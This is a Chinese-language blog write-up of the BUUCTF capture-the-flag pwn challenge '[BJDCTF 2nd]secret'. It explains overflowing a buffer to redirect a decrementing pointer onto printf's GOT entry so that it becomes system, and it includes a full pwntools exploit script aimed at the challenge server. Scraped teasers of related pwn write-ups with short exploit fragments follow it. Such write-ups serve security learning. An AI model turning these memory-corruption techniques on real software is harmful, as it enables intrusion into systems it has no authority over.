[BUUCTF-pwn]——[BJDCTF 2nd]secret

最新推荐文章于 2023-03-31 17:33:06 发布
最新推荐文章于 2023-03-31 17:33:06 发布
阅读量162 收藏
点赞数 1
分类专栏: # BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Y_peak/article/details/114881889
版权

[BUUCTF-pwn]——[BJDCTF 2nd]secret

这道题目,看就考验你的汇编能力了。

因为在反汇编的过程中,有一个函数过大,无法反汇编
在IDA中看到一个格外令人喜欢的东西,可是if 的条件无法反汇编。
在这里插入图片描述
进入汇编查看, 必须要这样下去,才可以往下面一看绝望呀。超级多

在这里插入图片描述
最后才给你赋值为0,虽然这样可以暴力破解,但是弄成千上万次,也够麻烦的。想要尝试的朋友可以试试。
在这里插入图片描述

既然上面那种方法太过于,笨重。接着看代码,发现
在这里插入图片描述
如果我们将printf的got表改为system的plt. 同时 buf写入我们想要的 “/bin/sh" 或者 ” cat flag" 问题也就可以解决。

最后发现他们距离仅仅0x10也就是16
在这里插入图片描述
在这里插入图片描述

同时,我们发现每次转跳都会执行,
在这里插入图片描述

在这里插入图片描述
瞌睡了送枕头, 发现里面这个东西每次都会减一而且用的是*, 也就是如果这个是printf_got的话,每次都会让got中的内容减一。

而它距离buf仅仅0x10,完全可以利用栈溢出进行覆盖
在这里插入图片描述

思路

修改off_46D090, 为printf_got。
转跳15次,也就是减去16
使得printf_got指向system

exploit

from pwn import *
 
#p = process('./secret')
p = remote('node3.buuoj.cn',26938)
elf = ELF('./secret')
printf_got = elf.got['printf']
 
keys = [0x476B,0x2D38,0x4540,0x3E77,0x3162,0x3F7D,0x357A,0x3CF5,0x2F9E,0x41EA,0x48D8,0x2763,0x474C,0x3809,0x2E63]

payload = '/bin/sh\x00'.ljust(0x10,'a') + p32(printf_got)
p.sendafter("What's your name?",payload)
for key in keys:
   p.sendlineafter('Secret:',str(key))
p.sendlineafter('Secret:','5201314')
 
p.interactive()
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF:[BJDCTF 2nd]A_Beautiful_Picture
Nobody Anyone
09-13 669
题目地址:https://buuoj.cn/challenges#[BJDCTF%202nd]A_Beautiful_Picture 使用010 editor打开的时候出现CRC匹配错误 修改图片高度 BJD{PnG_He1ghT_1s_WR0ng}
BUUCTF:[BJDCTF 2nd]EasyBaBa
Nobody Anyone
10-04 1641
题目地址:https://buuoj.cn/challenges#[BJDCTF%202nd]EasyBaBa binwalk分析,foremost分离 解压压缩包得到里面都是出题人.jpg 010 Editor分析,不认识的前缀,搜索一下 那这个文件应该就是视频文件了,怪不得这么大,修改后缀为.avi,视频在4.13s快速闪出过信息,我这里使用kinovea动画设计软件 官网:https://www.kinovea.org/ 一帧一帧的看,发现四张二维码,发现视频存在交错导致最后一张二维码识别不
[BUUCTF]PWN——bjdctf_2020_babystack
BangSen1的博客
03-29 359
例行检查,64位,开启NX保护 运行一下, 用IDA打开,检索字符串,看到了后门 跟进查看。 找到了地址,shelladdr=0x4006EA 查看主函数 接收函数长度由我们自己决定,由此可以造成溢出。 from pwn import* r=remote('node3.buuoj.cn',25232) shelladdr=0x4006EA r.sendline('100') payload='a'*(0x10+8)+p64(shelladdr) r.sendline(payload) r.
[BUUCTF]PWN——bjdctf_2020_babyrop
mcmuyanga的博客
10-07 3347
bjdctf_2020_babyrop[64位libc泄露] 题目附件 解题步骤: 例行检查,64位程序,开启了NX保护 试运行一下程序,看看大概的情况,看提示,应该是道泄露libc的题目 64位ida载入,shift+f12检索程序里的字符串,没有找到可以直接使用的system(’/bin/sh’) 从main函数开始看程序 main函数调用了一个vuln函数 buf的大小是0x20,read读入的长度是0x64,明显的溢出漏洞 根据已有的信息和得到的提示,是一道64位的libc泄露 利用思路:
BUUCTF|pwn-bjdctf_2020_babyrop-wp
l2645470582_的博客
11-09 324
1.例行检查保护机制 2. 我们用64位的IDA打开该文件 shift+f12查看关键字符串,没有找到关键字字符串 3.我们进入main函数看看 发现有两个函数 init():这里打印了两句话 vuln():打印了一句话,然后我们看到read()函数里面读取了0x64个buf,但是buf只有0x20个字节,所以这里是漏洞 4.system("/bin/sh") 我们用libc计算偏移量,再计算system("/bin/sh") base_addr...
BUUCTF|PWN-bjdctf_2020_babystack2-WP
l2645470582_的博客
11-09 463
1.例行检查保护机制 2.我们用64位的IDA打开该文件 shift+f12查看关键字符串,我们看到关键字符串"/bin/sh" 然后我们找到后门函数的地址:backdoor_addr = 0x0400726 3.我们看看main函数里面的内容 我们看到第一个nbytes是有符号数,第二个nbytes就变成了无符号数 我们判断这是一个整数溢出 所以 -1 = 4294967295 4.EXP #encoding = utf-8 fr...
[BUUCTF-pwn]——[BJDCTF 2nd]r2t4
Y_peak的博客
02-22 225
[BUUCTF-pwn]——[BJDCTF 2nd]r2t4 题目地址: https://buuoj.cn/challenges#[BJDCTF%202nd]r2t4 checksec一下,看一下。 IDA中,发现了后面函数和格式化字符串漏洞。 找到后门函数的地址, 并且算格式化字符串的偏移 思路 开启了canary保护,我们想要执行我们想要执行的代码, 可以通过触发canary保护, 进而触发__stack_chk_fail函数,执行。我们将got表地址改为我们想要执行的地址就可以了。 fm
[BUUCTF-pwn]——rip
Y_peak的博客
01-30 1283
BUUCTF——rip 题目地址:https://buuoj.cn/challenges 题目: 同样我们现将文件下载下来,在Linux上用checksec 看下信息,发现这是一个64位程序,并且任何保护都没开。???? (任何保护都没开,基本就是栈溢出) 在window用IDA反汇编看看,打扰了main函数没有任何有用的东西,没有我们要找的system函数 看看其他函数看看有没有,功夫不负有心人。fun函数中,有我们想要的东西 赶快查看下fun函数所在的位置 0x401186 。我们看到是在0x
BUUCTF-Pwn-bjdctf_2020_babyrop
餐桌上的猫
03-25 420
exp from pwn import* from LibcSearcher import * p=process('/home/lhb/桌面/bjdctf_2020_babyrop') elf=ELF('/home/lhb/桌面/bjdctf_2020_babyrop') p=remote('node4.buuoj.cn',27346) main=0x4006ad pop_rdi_ret=0x400733 puts_plt=elf.plt['puts'] puts_got=elf.got['puts']
BUUCTF pwn——bjdctf_2020_babystack
CNS-Enterprise BCC-1701-J
03-31 355
BUUCTF 做题练习
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
[BUUCTF-pwn]——warmup_csaw_2016
Y_peak的博客
01-30 4964
BUUCTF——warmup_csaw_2016 题目地址:https://buuoj.cn/challenges 题目: 管他三七二十一,先将文件下载下来再说。老规矩,现在Linux上用checksec看看文件。64位,Stack、NX、PIE都没有开,应该是栈溢出的题。 赶快 go go go 去window 上用IDA反汇编看看,看到返回的是gets函数,一个典型的可以利用栈溢出覆盖的地方。其他没什么有用的信息。 按Shift + F12,看一下字符串。不看不知道一看有惊喜。cat flag.
[BUUCTF-pwn]——ciscn_2019_n_3
Y_peak的博客
11-20 3202
[BUUCTF-pwn]——ciscn_2019_n_3 结构体: //该结构体仅仅是选择字符串的时候的结构体 struct chunk { void *rec_str_print(); void *rec_str_free(); char *str; } //该结构体仅仅是选择数字的时候的结构体 struct chunk { void *rec_int_print(); void *rec_int_free(); int number; } 这道题目就是简单的u
[BUUCTF-pwn]——ciscn_2019_n_8
Y_peak的博客
02-10 2590
[BUUCTF-pwn]——ciscn_2019_n_8 题目地址:https://buuoj.cn/challenges#ciscn_2019_n_8 题目 上去checksec一下,吓一跳保护基本全开了。 在IDA中一看,开心了。如此简单 只需要v[13] ==17 就好。因为var是以字符串的形式输入的。所以exploit如下: exploit from pwn import * p = remote("node3.buuoj.cn",29772) p.sendline("aaaa"*13 +
[BUUCTF-pwn]——jarvisoj_level0
Y_peak的博客
01-31 2334
[BUUCTF-pwn]——jarvisoj_level0 题目地址:https://buuoj.cn/challenges#jarvisoj_level0 题目: 还是先下载下来在Linux上checksex一下,基本确实又是栈溢出了。 64位,所以我们用64位的IDA打开,没什么有用的信息,点开vulnerable_function函数 发现栈溢出的read函数,前面为0意味着标准读入,后面的长度也可以。没毛病就是这个地方了。 再翻翻其他函数,发现了我们想要的system函数。找到位置,和需要覆
[BUUCTF-pwn]——others_shellcode
Y_peak的博客
02-12 1590
[BUUCTF-pwn]——others_shellcode 题目地址: https://buuoj.cn/challenges#others_shellcode peak 小知识 写这道题之前, 大家首先要了解, 想要获得一个shell, 除了system("/bin/sh") 以外, 还有一种更好的方法, 就是系统调用中的 execve("/bin/sh", NULL, NULL)获得shell。我们可以在 Linxu系统调用号表 中找到对应的系统调用号,进行调用, 其中系统调用号用 eax 储存
[BUUCTF-pwn]——ciscn_2019_es_2(内涵peak小知识)
Y_peak的博客
02-16 1539
[BUUCTF-pwn]——ciscn_2019_es_2 题目地址: https://buuoj.cn/challenges#ciscn_2019_es_2 这是一道栈劫持的题,第一次写这种题的题解写的详细一点。 栈劫持 or 栈迁移 栈劫持也可以称为栈迁移,用来解决栈本身可以利用的空间不够用,一般是溢出空间不够用,没办法有效构造rop链。这个时候我们可以通过劫持ebp的方式,利用leave 和 ret两个汇编指令来做到栈劫持(栈迁移)。 leave 等价于 mov ebp, esp; pop
buuctf-pwn入门
最新发布
01-26
### BUUCTF PWN 类题目入门教程 #### 学习资源推荐 对于希望进入PWN挑战领域的新手来说,选择合适的教材和平台至关重要。王爽老师的《汇编语言》提供了基础理论支持,有助于理解底层操作原理[^1]。此外,《IDA Pro...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值